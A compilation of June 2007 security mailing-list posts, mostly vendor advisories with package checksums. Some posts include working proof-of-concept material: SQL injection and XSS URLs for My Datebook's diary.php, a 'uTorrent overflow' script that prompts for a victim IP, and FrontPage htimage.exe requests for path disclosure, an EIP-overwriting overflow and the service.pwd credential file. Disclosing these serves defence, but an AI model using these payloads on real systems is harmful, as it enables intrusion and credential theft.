[ MDKSA-2007:110 ] - Updated php-pear packages fix directory traversal vulnerability

[security]

-BEGIN PGP SIGNED MESSAGE-
Hash: SHA1

 ___
 
 Mandriva Linux Security Advisory MDKSA-2007:110
 http://www.mandriva.com/security/
 ___
 
 Package : php-pear
 Date: June 4, 2007
 Affected: 2007.0, 2007.1, Corporate 3.0, Corporate 4.0
 ___
 
 Problem Description:
 
 A security hole was discovered in all versions of the PEAR Installer
 (http://pear.php.net/PEAR). The security hole is the most serious
 hole found to date in the PEAR Installer, and would allow a malicious
 package to install files anywhere in the filesystem.
 
 The vulnerability only affects users who are installing an
 intentionally created package with a malicious intent.  Because the
 package is easily traced to its source, this is most likely to happen
 if a hacker were to compromise a PEAR channel server and alter a
 package to install a backdoor. In other words, it must be combined
 with other exploits to be a problem.
 
 Updated packages have been patched to prevent this issue.
 ___

 References:
 
 http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2007-2519
 ___
 
 Updated Packages:
 
 Mandriva Linux 2007.0:
 64c39ee86584450d0107064891db66a4  
2007.0/i586/php-pear-5.1.6-1.1mdv2007.0.noarch.rpm 
 ad180de3fabf01f13300b60d27e69b8a  
2007.0/SRPMS/php-pear-5.1.6-1.1mdv2007.0.src.rpm

 Mandriva Linux 2007.0/X86_64:
 e9cd136d7adb4cd156e8609bee74142c  
2007.0/x86_64/php-pear-5.1.6-1.1mdv2007.0.noarch.rpm 
 ad180de3fabf01f13300b60d27e69b8a  
2007.0/SRPMS/php-pear-5.1.6-1.1mdv2007.0.src.rpm

 Mandriva Linux 2007.1:
 dc3c4b6fde1e247c7b7889720b9a1545  
2007.1/i586/php-pear-5.2.1-2.1mdv2007.1.noarch.rpm 
 c6314a0505a7acc4638bc6d001de3dce  
2007.1/SRPMS/php-pear-5.2.1-2.1mdv2007.1.src.rpm

 Mandriva Linux 2007.1/X86_64:
 d54d49680305ebe3e66074cb9ef9d837  
2007.1/x86_64/php-pear-5.2.1-2.1mdv2007.1.noarch.rpm 
 c6314a0505a7acc4638bc6d001de3dce  
2007.1/SRPMS/php-pear-5.2.1-2.1mdv2007.1.src.rpm

 Corporate 3.0:
 9d53ac39e37aeefb528ae3fd0992bdc3  
corporate/3.0/i586/php-pear-4.3.4-3.3.C30mdk.noarch.rpm 
 2af0291e0a641824b71b209f177ee498  
corporate/3.0/SRPMS/php-pear-4.3.4-3.3.C30mdk.src.rpm

 Corporate 3.0/X86_64:
 d32d35a205af81a080cf9081f1d09853  
corporate/3.0/x86_64/php-pear-4.3.4-3.3.C30mdk.noarch.rpm 
 2af0291e0a641824b71b209f177ee498  
corporate/3.0/SRPMS/php-pear-4.3.4-3.3.C30mdk.src.rpm

 Corporate 4.0:
 7adcd35487d7069c97dd103a46328348  
corporate/4.0/i586/php-pear-5.1.4-3.1.20060mlcs4.noarch.rpm 
 4a88c5020d4986d32fbd0fda00c6176c  
corporate/4.0/SRPMS/php-pear-5.1.4-3.1.20060mlcs4.src.rpm

 Corporate 4.0/X86_64:
 efba2ee2dc33696c001dab09cfe6dd34  
corporate/4.0/x86_64/php-pear-5.1.4-3.1.20060mlcs4.noarch.rpm 
 4a88c5020d4986d32fbd0fda00c6176c  
corporate/4.0/SRPMS/php-pear-5.1.4-3.1.20060mlcs4.src.rpm
 ___

 To upgrade automatically use MandrivaUpdate or urpmi.  The verification
 of md5 checksums and GPG signatures is performed automatically for you.

 All packages are signed by Mandriva for security.  You can obtain the
 GPG public key of the Mandriva Security Team by executing:

  gpg --recv-keys --keyserver pgp.mit.edu 0x22458A98

 You can view other update advisories for Mandriva Linux at:

  http://www.mandriva.com/security/advisories

 If you want to report vulnerabilities, please contact

  security_(at)_mandriva.com
 ___

 Type Bits/KeyID Date   User ID
 pub  1024D/22458A98 2000-07-10 Mandriva Security Team
  
-BEGIN PGP SIGNATURE-
Version: GnuPG v1.4.7 (GNU/Linux)

iD8DBQFGZF3tmqjQ0CJFipgRAqHdAJ4/U5xXkgz1tBilWMJ33y6J4jbx4QCfY8nk
IEujjQWOE/jaPU3KqZQxiMA=
=VLsJ
-END PGP SIGNATURE-

Disinfectors for the calculator virus (ti89.Gaara)

[Piotr Bania]

Hey,

For those who are interrested, i made two types of Gaara (the calculator 
virus) disinfectors. The first one patches the virus body, which causes 
to return the control to the host just when the EPO injection travels 
the control to the virus. So the virus will not get executed at all.
And the second one is trying to find an EPO injection by searching for 
BRA opcodes, and testing them for suitable conditions.



Here are the codes:
Dis1:
Source:
http://piotrbania.com/all/ti89/dis1.c

Binary:
http://piotrbania.com/all/ti89/dis1.89z

Dis2:
Source:
http://piotrbania.com/all/ti89/dis2.c

Binary:
http://piotrbania.com/all/ti89/dis2.89z


i hope you will find them somehow interresting.

best regards,
pb


--

Piotr Bania - <[EMAIL PROTECTED]> - 0xCD, 0x19
Fingerprint: 413E 51C7 912E 3D4E A62A  BFA4 1FF6 689F BE43 AC33
http://www.piotrbania.com  - Key ID: 0xBE43AC33


  - "The more I learn about men, the more I love dogs."

Unpatched input validation flaw in Firefox 2.0.0.4

[Thor Larholm]

Firefox 2.0.0.4 contains a fix for a directory traversal vulnerability
that allowed you to read local files through the resource protocol.

However, the patch only partially fixed the vulnerability on Windows
systems and accidentally circumvents an existing input validation
check.

The net result is that you can still read some local files on Windows
and all user accessible files on Linux/Unix/OS X, with all user
accessible files potentially readable as well on Windows through the
patch regression.

http://larholm.com/2007/06/04/unpatched-input-validation-flaw-in-firefox-2004/

Cheers

Thor Larholm

Re: [PLESK 7.5 Reload] & [PLESK 7.6 for MS Windows] path passing and disclosure vulnerability

[leo]

I tried this on my server and it doesnt seem to work - asks me to login

RE: bugtraq submission

[Warner Moore]

> -Original Message-
> From: [EMAIL PROTECTED] [mailto:[EMAIL PROTECTED] 
> Sent: Friday, June 01, 2007 12:50 PM
> To: bugtraq@securityfocus.com
> Subject: bugtraq submission
> 
> There are numerous XSS vulnerabilities in PHPLive v3.2.2 
> (Maybe others)


This vendor is incredibly non-resposive and apathetic about any
security issue.  I have yet to be contacted regarding previous issues and we
often end up having to fix them ourselves.

Anyone have better luck?

Warner

rPSA-2007-0115-1 libexif

[rPath Update Announcements]

rPath Security Advisory: 2007-0115-1
Published: 2007-06-04
Products: rPath Linux 1
Rating: Minor
Exposure Level Classification:
Indirect User Deterministic Denial of Service
Updated Versions:
libexif=/[EMAIL PROTECTED]:devel//1/0.6.15-0.1-1

References:
http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2007-2645
https://issues.rpath.com/browse/RPL-1431

Description:
Previous versions of the libexif package can cause applications to
crash when loading malformed exif data.  It is not currently known
whether this vulnerability can be exploited to execute malicious code.

Copyright 2007 rPath, Inc.
This file is distributed under the terms of the MIT License.
A copy is available at http://www.rpath.com/permanent/mit-license.html

rPSA-2007-0114-1 mutt

[rPath Update Announcements]

rPath Security Advisory: 2007-0114-1
Published: 2007-06-04
Products: rPath Linux 1
Rating: Major
Exposure Level Classification:
Local User Deterministic Privilege Escalation
Updated Versions:
mutt=/[EMAIL PROTECTED]:devel//1/1.4.2.3-0.1-1

References:
http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2007-1558
http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2007-2683
http://dev.mutt.org/trac/ticket/2846
https://bugzilla.redhat.com/bugzilla/show_bug.cgi?id=239890
https://issues.rpath.com/browse/RPL-1232
https://issues.rpath.com/browse/RPL-1391

Description:
In previous versions of the mutt package, it is possible for an attacker
to subvert other local users' mutt processes causing them to run
attacker-provided code. Additionally, it is possible for a hostile server 
masquerading as a user's APOP server to determine some characters from a
user's password.

Copyright 2007 rPath, Inc.
This file is distributed under the terms of the MIT License.
A copy is available at http://www.rpath.com/permanent/mit-license.html

SYM07-009,Symantec Storage Foundation for Windows Volume Manager: Authentication Bypass and Potential Code Execution in Scheduler Service

[secure]

Symantec Security Advisory

http://www.symantec.com/avcenter/security/Content/2007.06.01.html

SYM07-009

1 June, 2007
Symantec Storage Foundation for Windows Volume Manager:  Authentication Bypass 
and Potential Code Execution in Scheduler Service

Revision History
None 

Severity
Medium 


Remote Access Yes, Local network access required
Local Access No
Authentication Required No
Exploit publicly available No


Overview
An authentication bypass, remote code execution vulnerability has been 
identified and resolved in the Symantec Storage Foundation for Windows v5.0 
Volume Manager Scheduler Service.Successful exploitation could result in 
potential compromise of the targeted system.

Product(s) Affected 
Product Version Solution(s)
Symantec Storage Foundation
for Windows 5.0 http://support.veritas.com/docs/288627


Product(s) Not Affected
Product Version
Symantec Storage Foundation for Windows 3.1
Symantec Storage Foundation for Windows 4.1, 4.1RP1
Symantec Storage Foundation for Windows 4.2, 4.2RP1, 4.2RP2

Details
3Com’s Zero Day Initiative, notified Symantec of an authentication bypass and 
arbitrary code execution vulnerability discovered in the Symantec Storage 
Foundation for Windows Scheduler Service, VxSchedService.exe.  The Scheduler 
Service server, initially introduced in Symantec Storage Foundation for Windows 
v5.0, listens for incoming scheduling messages from client systems.  An 
attacker with network access who could successfully connect directly to the 
Scheduler Service socket could bypass the built-in authentication in the 
management console.  By properly manipulating this vector, the attacker has the 
potential to possibly add arbitrary commands to the registry that could be 
executed during normal scheduled runs.
This vulnerability, if successfully exploited, would most likely be initiated 
by a malicious user authenticated on the local network since the affected 
service port should not normally be available to other than authorized network 
systems.  Any potentially successful attack by a non-authorized remote attacker 
would most likely be a scenario of enticing an authorized user to run or allow 
to run malicious code that might successfully exploit this issue.

Symantec Response
Symantec takes the security of our products and our customers very seriously. 
Symantec engineers have verified and corrected this issue in Symantec’s Storage 
Foundation for Windows 5.0. 

Updates are available for supported products. Symantec recommends customers 
apply the latest product update available for their supported product versions 
to enhance their security posture and protect against potential security 
threats of this nature.

Symantec knows of no exploitation of or adverse customer impact from this issue.


The patches listed above for affected product/version are available from the 
following location:
 http://support.veritas.com/docs/288627
Best Practices
As part of normal best practices, Symantec strongly recommends: 
* Restrict access to administration or management systems to privileged users.
* Restrict remote access, if required, to trusted/authorized systems only.
* Run under the principle of least privilege where possible to limit the impact 
of exploit by threats. 
* Keep all operating systems and applications updated with the latest vendor 
patches. 
* Follow a multi-layered approach to security. Run both firewall and 
anti-malware applications, at a minimum, to provide multiple points of 
detection and protection to both inbound and outbound threats. 
* Deploy network and host-based intrusion detection systems to monitor network 
traffic for signs of anomalous or suspicious activity. This may aid in 
detection of attacks or malicious activity related to exploitation of latent 
vulnerabilities

CVE
The Common Vulnerabilities and Exposures (CVE) initiative has assigned CVE 
Candidate CVE-2007-2279 to this issue.
. 
This issue is a candidate for inclusion in the CVE list (http://cve.mitre.org), 
which standardizes names for security problems. 

Credit:
Symantec would like to thank 3Com/ZDI for reporting this issue and for 
providing full coordination while Symantec resolved it.

FLEA-2007-0024-1: libexif

[Foresight Linux Essential Advisory Service]

-BEGIN PGP SIGNED MESSAGE-
Hash: SHA1

Foresight Linux Essential Advisory: 2007-0024-1
Published: 2007-06-04

Rating: Moderate

Updated Versions:
libexif=/[EMAIL PROTECTED]:devel//[EMAIL PROTECTED]:1-devel//1/0.6.15-0.1-1
group-dist=/[EMAIL PROTECTED]:1-devel//1/1.3-0.1-6

References:
http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2007-2645
https://issues.rpath.com/browse/RPL-1431

Description:
Previous versions of the libexif package were vulnerable to an int overflow 
when loading EXIF data which could cause a crash (denial of service) or 
potentially allow the attacker to execute arbitrary code at the permission 
level of the user running a program which uses libexif.

- ---

Copyright 2007 Foresight Linux Project
This file is distributed under the terms of the MIT License.
A copy is available at http://www.foresightlinux.org/permanent/mit-license.html

-BEGIN PGP SIGNATURE-
Version: GnuPG v2.0.4 (GNU/Linux)

iQIVAwUBRmRzrNfwEn07iAtZAQLxIRAAv5km2r7UwvY40dnIo+JyLnNAhuvMHpb+
AhuXz+zTwOTigH9Dj0/cwwYqAbpYsuiX9cQRRqtjgxph5NOOYzE5F/w8pZzIDPgN
jK4LbbDxOFWNv8Z8U84p5LLgFkcoXUajemC/qiLbz+vKC601Cnl7dFUSDs3YHSGq
ndqwxtsRFpAQyc/lrbSFTGNFB0CIXUebgWTB66F2CSHP2sAGLoLCaxdFg6ELnNCC
KiOfWGzVXqVZm5JHgDJ1LkTqKLY33LW1hAmdEYURHyDsv/yICk2BMWvaof5BqnF9
+bOigSv/aSjWis7jLJSX/JwL7GahRdtGloQebWKbxhPsYd5EQmGn11HulobCdcye
1epdIZn+yFbxxRrsOqWBawxc9XWMhOyzjOhenNpH+ebN86qrUxbKdF2fj2iLCyDG
mFFx0NCTSh/gAKUdZWq3J9x9lzikjYwf8hFzSLm8nUtSLa8G8bp5zfHW2GNRnmqB
71oT3j6HUH93E1FwHBv9EL9x/sHw074Mbv2GC2XVN6rfHLyOfQcTszwaDgdQ2r/j
SakgqyhQ7kUzO5eQbSntKdoscGBmXr0bMGfePTEMV8LfIpHTJUA0NwY+cItON8oF
ylqH3T4sHo+wJXJSFZ8KyG9/xiyUJ6cmJk6JdlPj33/4uOpXd8/pxXSiiYI+HvrB
gnhs6OBwDBg=
=PLpW
-END PGP SIGNATURE-

[SECURITY] [DSA 1291-4] New samba packages fix regression

[Moritz Muehlenhoff]

-BEGIN PGP SIGNED MESSAGE-
Hash: SHA1

- --
Debian Security Advisory DSA 1291-4[EMAIL PROTECTED]
http://www.debian.org/security/ Moritz Muehlenhoff
June 4th, 2007  http://www.debian.org/security/faq
- --

Package: samba
Vulnerability  : several
Problem type   : remote
Debian-specific: no
CVE Id(s)  : CVE-2007-2444 CVE-2007-2446 CVE-2007-2447

The security update for CVE-2007-2446 introduced a regression, which
broke connection to domain member servers in some scenarios. This update
fixes this regression.

For the stable distribution (etch), this regression has been fixed in
version 3.0.24-6etch4.

The old stable distribution (sarge) is not affected by this problem.

For the unstable distribution (sid) this regression has been fixed in
version 3.0.25a-1.

We recommend that you upgrade your samba package.

Upgrade Instructions
- 

wget url
will fetch the file for you
dpkg -i file.deb
will install the referenced file.

If you are using the apt-get package manager, use the line for
sources.list as given below:

apt-get update
will update the internal database
apt-get upgrade
will install corrected packages

You may use an automated update by adding the resources from the
footer to the proper configuration.

Debian GNU/Linux 4.0 alias etch
- ---

  Source archives:

http://security.debian.org/pool/updates/main/s/samba/samba_3.0.24-6etch4.dsc
  Size/MD5 checksum: 1425 8f114259be89190e485ce7af9819237a

http://security.debian.org/pool/updates/main/s/samba/samba_3.0.24-6etch4.diff.gz
  Size/MD5 checksum:   213975 b1f423e27b5e602bde20079af4def838

http://security.debian.org/pool/updates/main/s/samba/samba_3.0.24.orig.tar.gz
  Size/MD5 checksum: 17708128 89273f67a6d8067cbbecefaa13747153

  Architecture independent components:


http://security.debian.org/pool/updates/main/s/samba/samba-doc-pdf_3.0.24-6etch4_all.deb
  Size/MD5 checksum:  6598934 edd2357b274c390c5eb1b717375739d3

http://security.debian.org/pool/updates/main/s/samba/samba-doc_3.0.24-6etch4_all.deb
  Size/MD5 checksum:  6913278 b021af0b6c3418b746ba8601633b1074

  Alpha architecture:


http://security.debian.org/pool/updates/main/s/samba/libpam-smbpass_3.0.24-6etch4_alpha.deb
  Size/MD5 checksum:   482930 b6e67ff868c705124ecc222c294b6325

http://security.debian.org/pool/updates/main/s/samba/libsmbclient_3.0.24-6etch4_alpha.deb
  Size/MD5 checksum:   879454 8d5b5d98ae37936a88fe620048b9e894

http://security.debian.org/pool/updates/main/s/samba/libsmbclient-dev_3.0.24-6etch4_alpha.deb
  Size/MD5 checksum:   113980 833b703e6ba45577a13fa43e3d62f960

http://security.debian.org/pool/updates/main/s/samba/python-samba_3.0.24-6etch4_alpha.deb
  Size/MD5 checksum:  6705198 df69305a975f71d4b8516c9e40e10d21

http://security.debian.org/pool/updates/main/s/samba/samba_3.0.24-6etch4_alpha.deb
  Size/MD5 checksum:  4000734 067cc959bf00313dcbccfba7d7b25071

http://security.debian.org/pool/updates/main/s/samba/samba-common_3.0.24-6etch4_alpha.deb
  Size/MD5 checksum:  2841182 c1888f9524b3164a51d82e18645b21bd

http://security.debian.org/pool/updates/main/s/samba/samba-dbg_3.0.24-6etch4_alpha.deb
  Size/MD5 checksum: 12298040 b8c24282e1905515e8df4027285ead0e

http://security.debian.org/pool/updates/main/s/samba/smbclient_3.0.24-6etch4_alpha.deb
  Size/MD5 checksum:  4845482 b0855a6477a5360108d386bf1d9c638e

http://security.debian.org/pool/updates/main/s/samba/smbfs_3.0.24-6etch4_alpha.deb
  Size/MD5 checksum:   521328 3650131a525b484a052a9187d91fd952

http://security.debian.org/pool/updates/main/s/samba/swat_3.0.24-6etch4_alpha.deb
  Size/MD5 checksum:   956084 3c86aa8c33d96d4c29b3c423fb17f436

http://security.debian.org/pool/updates/main/s/samba/winbind_3.0.24-6etch4_alpha.deb
  Size/MD5 checksum:  2286240 6ad90d8e15d1910a7c341682c1b0952b

  AMD64 architecture:


http://security.debian.org/pool/updates/main/s/samba/libpam-smbpass_3.0.24-6etch4_amd64.deb
  Size/MD5 checksum:   461894 76ea859453e8a97b4e41c4cfb2688f08

http://security.debian.org/pool/updates/main/s/samba/libsmbclient_3.0.24-6etch4_amd64.deb
  Size/MD5 checksum:   831230 c8cf22235f65be1a6141bb026b5449e8

http://security.debian.org/pool/updates/main/s/samba/libsmbclient-dev_3.0.24-6etch4_amd64.deb
  Size/MD5 checksum:   112268 49c6b6a6566e8387fce1a5db47222499

http://security.debian.org/pool/updates/main/s/samba/python-samba_3.0.24-6etch4_amd64.deb
  Size/MD5 checksum:  6254586 ac66bce2c71fc3a619b0f7f5beb9fbf8

http://security.debian.org/pool/updates/main/s/samba/samba_3.0.24-6etch4_amd64.deb
  Size/MD5 checksum:  3601620 d183a5bc0a81658d

n.runs-SA-2007.014 - F-Secure Antivirus ARJ parsing Infinite Loop Advisory

[security]

n.runs AG  
http://www.nruns.com/  security(at)nruns.com
n.runs-SA-2007.014   04-Jun-2007


Vendor:F-Secure Corporation, http://www.f-secure.com
Affected Products:  
F-Secure Anti-Virus for Workstations version 7.00 and earlier
F-Secure Anti-Virus for Windows Servers version 7.00 and earlier
F-Secure Anti-Virus for Citrix Servers version 5.52
F-Secure Anti-Virus for MIMEsweeper version 5.61 and earlier
F-Secure Anti-Virus Client Security version 7.00 and earlier
F-Secure Anti-Virus for MS Exchange version 7.00 and earlier
F-Secure Internet Gatekeeper version 6.60 and earlier 
F-Secure Internet Security 2005, 2006 and 2007
F-Secure Anti-Virus 2005, 2006 and 2007
Solutions based on F-Secure Protection Service for Consumers version 7.00
and earlier
F-Secure Anti-Virus for Linux Servers version 4.65 and earlier
F-Secure Anti-Virus for Linux Gateways version 4.65 and earlier 
F-Secure Anti-Virus Linux Client Security 5.52 and earlier
F-Secure Anti-Virus Linux Server Security 5.52 and earlier
F-Secure Internet Gatekeeper for Linux 2.16 and earlier
Vulnerability: Infinite Loop DoS (remote) 
Risk:  HIGH


Vendor communication:

  2007/05/07initial notification to F-Secure Corporation
  2007/05/08F-Secure Corporation Response
  2007/05/08PGP public keys exchange
  2007/05/08PoC files sent to F-Secure Corporation
  2007/05/14F-Secure Corporation acknowledged the PoC files
  2007/05/18F-Secure Corporation validate the Vulnerability
  2007/05/18F-Secure Corporation notify update release date
  2007/05/30F-Secure Corporation released Update with fixes


Overview:
 
F-Secure Corporation protects consumers and businesses against computer
viruses and other threats from the Internet and mobile networks.
F-Secure award-winning solutions are available for workstations, gateways,
servers and mobile phones. They include antivirus and desktop firewall with
intrusion prevention, antispam and antispyware solutions, as well as network
control solutions for Internet Service Providers.
F-Secure protection is also available as a service through major ISPs, such
as France Telecom, TeliaSonera, PCCW and Charter Communications. F-Secure is
the global market leader in mobile phone protection provided through mobile
operators, such as T-Mobile and Swisscom and mobile handset manufacturers
such as Nokia.

Description:

A remotely exploitable vulnerability has been found in the files parsing
engine.

In detail, the following flaw was determined:

- Infinite Loop in .ARJ files parsing


Impact:

This problem can lead to remote denial of service provoked by high CPU
consume and exhaustion of storage resource if an attacker carefully crafts a
file that exploits the aforementioned vulnerability. The vulnerability is
present in F-Secure Corporation software products above mentioned in all
platforms supported by the affected products. 

Solution: 
The vulnerability was reported on 07.May.2007 and an update has been issued
on 30.May.2007 to solve this vulnerability. For detailed information about
the fixes follow the link in References [1] section of this document.


Credit: 
Bugs found by Sergio Alvarez of n.runs AG. 


References: 
http://www.f-secure.com/security/fsc-2007-3.shtml [1]

This Advisory and Upcoming Advisories:
http://www.nruns.com/parsing-engines-advisories.php


Unaltered electronic reproduction of this advisory is permitted. For all
other reproduction or publication, in printing or otherwise, contact
[EMAIL PROTECTED] for permission. Use of the advisory constitutes
acceptance for use in an "as is" condition. All warranties are excluded. In
no event shall n.runs be liable for any damages whatsoever including direct,
indirect, incidental, consequential, loss of business profits or special
damages, even if n.runs has been advised of the possibility of such damages.


Copyright 2007 n.runs AG. All rights reserved. Terms of apply.

My Datebook SQL Injection + XSS

[ls]

Application: My Datebook
Web Sites: http://mealex.com/scripts.html
   http://www.theadminshop.com/
Versions: any (no version numbers can be found)
Platform: linux, windows, freebsd, sun
Bug: SQL Injection + XSS
Severity: High (since there is no need to authenticate.)
Fix Available: No

---

1) Introduction
2) Bug
3) The Code
4) Fix
5) About
6) Disclaimer

===
1) Introduction
===

"My DataBook is a simple, php & mysql personal organizer."

==
2) Bug
==

many SQL Injections and many XSS.

===
3) Proof of concept.
===

The File diary.php is subject to several SQL Injections.

some examples are:

http://site/apppath/diary.php?month=06&year=2007&day=01&delete=%27
http://site/apppath/diary.php?month=06&year=2007&day=01&delete=%00'

XSS example:


http://site/apppath/diary.php?Sec=diary&month=06&year=alert(123123123)%3B&day=01

=
4) Fix
=

the authors email or contact details were not availble.
if you using this software, try to fix it yourself or change it.


5) About Serapis.net


www.Serapis.net - is a portal dedicated to web defacements, 
  tracking defacements around the world.

==
6) Disclaimer
==

The information within this paper may change without notice. 
Use of this information constitutes acceptance for use in an AS IS condition. 
There are NO warranties with regard to this information. 
In no event shall the author be liable for any damages whatsoever arising out 
of or in connection with the use or spread of this information. 
Any use of this information is at the user's own risk.

http://www.serapis.net
http://calima.serapis.net/blogs/

n.runs-SA-2007.015 - F-Secure Antivirus FSG packed files parsing Infinite Loop Advisory

[security]

n.runs AG  
http://www.nruns.com/  security(at)nruns.com
n.runs-SA-2007.015   04-Jun-2007


Vendor:F-Secure Corporation, http://www.f-secure.com
Affected Products:  
F-Secure Anti-Virus for Workstations version 7.00 and earlier
F-Secure Anti-Virus for Windows Servers version 7.00 and earlier
F-Secure Anti-Virus for Citrix Servers version 5.52
F-Secure Anti-Virus for MIMEsweeper version 5.61 and earlier
F-Secure Anti-Virus Client Security version 7.00 and earlier
F-Secure Anti-Virus for MS Exchange version 7.00 and earlier
F-Secure Internet Gatekeeper version 6.60 and earlier 
F-Secure Internet Security 2005, 2006 and 2007
F-Secure Anti-Virus 2005, 2006 and 2007
Solutions based on F-Secure Protection Service for Consumers version 7.00
and earlier
F-Secure Anti-Virus for Linux Servers version 4.65 and earlier
F-Secure Anti-Virus for Linux Gateways version 4.65 and earlier 
F-Secure Anti-Virus Linux Client Security 5.52 and earlier
F-Secure Anti-Virus Linux Server Security 5.52 and earlier
F-Secure Internet Gatekeeper for Linux 2.16 and earlier
Vulnerability: Infinite Loop DoS (remote) 
Risk:  HIGH


Vendor communication:

  2007/05/07initial notification to F-Secure Corporation
  2007/05/08F-Secure Corporation Response
  2007/05/08PGP public keys exchange
  2007/05/08PoC files sent to F-Secure Corporation
  2007/05/14F-Secure Corporation acknowledged the PoC files
  2007/05/18F-Secure Corporation validate the Vulnerability
  2007/05/18F-Secure Corporation notify update release date
  2007/05/30F-Secure Corporation released Update with fixes


Overview:
 
F-Secure Corporation protects consumers and businesses against computer
viruses and other threats from the Internet and mobile networks.
F-Secure award-winning solutions are available for workstations, gateways,
servers and mobile phones. They include antivirus and desktop firewall with
intrusion prevention, antispam and antispyware solutions, as well as network
control solutions for Internet Service Providers.
F-Secure protection is also available as a service through major ISPs, such
as France Telecom, TeliaSonera, PCCW and Charter Communications. F-Secure is
the global market leader in mobile phone protection provided through mobile
operators, such as T-Mobile and Swisscom and mobile handset manufacturers
such as Nokia.

Description:

A remotely exploitable vulnerability has been found in the files parsing
engine.

In detail, the following flaw was determined:

- Infinite Loop in FSG packed files parsing


Impact:

This problem can lead to remote denial of service provoked by high CPU
consume and exhaustion of storage resource if an attacker carefully crafts a
file that exploits the aforementioned vulnerability. The vulnerability is
present in F-Secure Corporation software products above mentioned in all
platforms supported by the affected products. 

Solution: 
The vulnerability was reported on 07.May.2007 and an update has been issued
on 30.May.2007 to solve this vulnerability. For detailed information about
the fixes follow the link in References [1] section of this document.


Credit: 
Bugs found by Sergio Alvarez of n.runs AG. 


References: 
http://www.f-secure.com/security/fsc-2007-3.shtml [1]

This Advisory and Upcoming Advisories:
http://www.nruns.com/parsing-engines-advisories.php


Unaltered electronic reproduction of this advisory is permitted. For all
other reproduction or publication, in printing or otherwise, contact
[EMAIL PROTECTED] for permission. Use of the advisory constitutes
acceptance for use in an "as is" condition. All warranties are excluded. In
no event shall n.runs be liable for any damages whatsoever including direct,
indirect, incidental, consequential, loss of business profits or special
damages, even if n.runs has been advised of the possibility of such damages.


Copyright 2007 n.runs AG. All rights reserved. Terms of apply.

Re: Buffer overflow in BusinessMail email server system 4.60.00

[Steve Tornio]

[EMAIL PROTECTED] wrote:

This problem was corrected within 14 days, and a new SMTP server was provided 
on our web site. This was back in 2005, we are now almost TWO YEARS ON, and you 
still claim it is a problem.



It is unclear who "you" is supposed to be here.  I'm guessing this is 
the vulnerability referred to by:


OSVDB 18407
CVE 2005-2472
ISS 21636
Secunia 16306
Bugtraq 14434

None of these indicate a solution is available.

The Mail List post reporting this vulnerability was 
http://archives.neohapsis.com/archives/fulldisclosure/2005-08/0002.html


In the post, it says that a patch will soon be available.  A quick 
glance at the download page at http://www.netcplus.com/downloads.html 
doesn't reveal a link to download the patch for 4.6.  I also don't see 
any advisory for users of 4.6 that a patch is available.


We will be happy to update our entry at osvdb.org, after verifying that 
a patch exists for 4.6, and an upgrade to 4.7 also solves the problem. 
Is that correct?


Thanks,
Steve Tornio
osvdb.org


You **were** notified of the release of the fix, and we have many other 
confirmations that it is indeed a good fix.

We are now at 4.7 of BusinessMail, and that also still blocks this 
"vulenrability", and yet you continue to publich out of ate dand inaccurate 
information as being the truth.

Kindly update your published information as relevant to reflect the true facts 
of this buglet.

You can download an evaluation BusinessMail system from our web site to test 
this for yourself if you still do not beleive us.

Thank You

uTorrent overflow

[Dj . r4iDeN]

#!/bin/bash
#
#   uTorrent overflow
#   mail: dj.r4iden[at]gmail.com
#   greet to : StrikerX , St0rM-MaN ,  MedoZero , hack_egy ,CPU
# you must kno the victim ip and the port he use in uTorrent 
#
clear
echo "Enter your victam IP?"
echo " "
read victamIP
victamIP=$victamIP
echo " Enter your victam port?"
echo " "
read victamport
victamport=$victamport
echo "after you connect hold the enter key"
echo -n "you wanna connect now?(y/n)"
read X
if [ "$X" = "y" ];then
telnet $victamIP $victamport
elif [ "$X" = "n" ];then
echo " good bye"
echo -n "exploit by dj.r4iden[at]gmail.com"
fi

Recent OpenSSL exploits

[Ryan's spam address]

Has anyone seen anything floating around for the OpenSSL 
SSL_Get_Shared_Ciphers Buffer Overflow (CVE-2006-3738/Bugtraq ID 20249)?


I've been told there is one that has recently been floating around with 
blackhats, but I'm unable to confirm/deny.



Ryan

CERN İmage Map Dispatcher

[h0tturk]

CERN Image Map Dispatcher (/cgi-bin/htimage.exe) comes by default with 
FrontPage. I
found three bugs
in "htimage.exe": 1) Gives us the full path to the root directory 2) Simple 
buffer
overflow 3) Allow
us to access files.


Problem #1
~~
Like I said, the first bug gives us the full path to the root directory. I 
tested this
vulnerability
against some servers, all where vulnerable!

Tested / Vulnerable FP Servers: 3.0.2.926 (FrontPage'98), 3.0.2.1706, 
4.0.2.2717,
2.0.1.927, 3.0.2.926,
3.0.2.1105, 3.0.2.1330, 3.0.2.1117 (All Windows based web servers are 
vulnerable if we
have premission
to execute "htimage.exe" + If "htimage.exe" exist).

To test this vulnerability we need "htimage.exe" in our "cgi-bin" directory 
(it's
installed by default)
and premission to execute it. That's why only Windows is vulnerable, Unix based
systems can't execute
"*.exe" files.

If we access "htimage.exe" using our favorite web browser like:
http://server/cgi-bin/htimage.exe/linux?0,0
we get this error:

-
---
Error

Error calling HTImage:

Picture config file not found, tried the following:

q:/hidden_directory_because_of_the_script_kiddies/webroot/linux
/linux
-
---

Now we know that the path to the root directory is
"q:/hidden_directory_because_of_the_script_kiddies/webroot/".

Problem #2
~~
Like I said, simple buffer overflow. Tested against "Microsoft-PWS-95/2.0" and
"FrontPage-PWS32".
Tested / Vulnerable OS: Windows'95/98
"htimage.exe" buffer overflows if we access it like:
http://server/cgi-bin/htimage.exe/<741 A's>?0,0.

-
---
HTIMAGE caused an invalid page fault in
module  at :41414141.
Registers:
0EAX=815c6240 CS=0137 EIP=41414141 EFLGS=00010246
EBX=0063fe28 SS=013f ESP=005400b4 EBP=005400d4
ECX=0054015c DS=013f ESI=005401a0 FS=3467
EDX=bff76648 ES=013f EDI=00540184 GS=
Bytes at CS:EIP:

Stack dump:
bff7663c 00540184 0063fe28 005401a0 0054015c 00540290 bff76648 0063fe28
0054016c bff85a0a 00540184 0063fe28 005401a0 0054015c 41414141 0054034c
-
---
 + <500 Server Error>

First remote FrontPage exploit?


Problem #3
~~
It's not a serious bug. Using "htimage.exe" we can access files on server, but
we can't read them. Accessing "htimage.exe" like:
http://server/cgi-bin/htimage.exe/_vti_pvt/service.pwd?0,0
outputs:

-
---
Error

Error calling HTImage:

HTImage.c: Syntax error at line 1 Bad field name, expecting 'default', 
'rectangle',
'circle' or
'polygon' (got an alphanumeric string)
-
---

